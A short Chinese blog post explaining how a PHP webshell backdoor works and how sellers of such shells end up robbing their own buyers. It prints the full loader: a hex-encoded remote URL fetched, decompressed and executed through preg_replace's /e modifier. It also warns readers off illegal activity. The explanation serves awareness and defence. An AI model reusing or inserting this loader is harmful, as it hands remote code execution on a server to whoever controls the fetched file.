举个例子
<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>
这里我们主要看
sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())
这串代码看起来可能平平无奇,但是执行过后其实是一张箱子的图片地址,这个地址我就不放出来了,有兴趣的可以自己搭建解密!这个图片还需要调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码。然后,shell就被装进箱子里了。
黑吃黑是怎么形成的
其实网络安全圈子里定义一直模糊,有人兢兢业业挖洞,做src;有人背地里干违法勾当,赚黑心钱。天天在群里秀,挖洞的一部分人就会想
极少数违法分子就觉得自己挖太危险了,重新换个思路:
这伙人写好了后门,疯狂推广,进账,然后被抓…
“违法犯罪得事一定不能做!”
这就是黑吃黑产业链了,他们背后链接的产业咋们下期再说!
也希望各位网络安全爱好者,同行,且行且珍惜,莫做违法事!制作不易点个赞再走吧!靓仔!
本文暂时没有评论,来添加一个吧(●'◡'●)